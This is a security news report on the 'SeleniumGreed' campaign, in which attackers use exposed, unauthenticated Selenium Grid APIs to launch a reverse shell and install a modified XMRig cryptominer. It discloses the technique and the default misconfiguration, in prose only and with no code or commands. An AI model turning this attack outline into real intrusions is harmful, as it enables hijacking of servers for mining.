A threat actor, dubbed 'SeleniumGreed,' is targeting publicly exposed instances of Selenium Grid and uses features of Selenium WebDriver API to run a reverse shell to deploy scripts that download a XMRig miner, Wiz researchers have discovered.

SeleniumGreed exploits the Selenium WebDriver API to run commands on underlying servers, installing cryptocurrency miners in the process.  Selenium Grid ships with the API's authentication disabled by default. This default setting has left more than 17,000 Selenium Grid servers with unprotected APIs exposed online.

“Selenium is one of the most widely used testing frameworks in the industry,” Wiz noted. “Our data shows that it is utilized in 30% of cloud environments, and the official selenium/hub Docker image has over 100 million pulls on Docker Hub. By default, authentication is not enabled for this service, leading to many publicly accessible instances being misconfigured and vulnerable.”

The threat actor uses a modified XMRig miner packed with custom UPX headers. To avoid detection and tracking, SeleniumGreed employs various stealth techniques, including leveraging workloads of other compromised Selenium nodes as command-and-control (C2) servers and mining pool proxies.

The attack begins with the adversary sending a request to a vulnerable Selenium Grid hub, aiming to execute a Python program containing a Base64-encoded payload. This payload spawns a reverse shell connecting to an attacker-controlled server at IP address, which then fetches the final payload—a modified XMRig miner. Notably, the IP address is associated with a legitimate service that has itself been compromised, and it hosts a publicly exposed Selenium Grid instance.

The researchers said that the threat actor has been active for over a year, and the observed campaign is still active.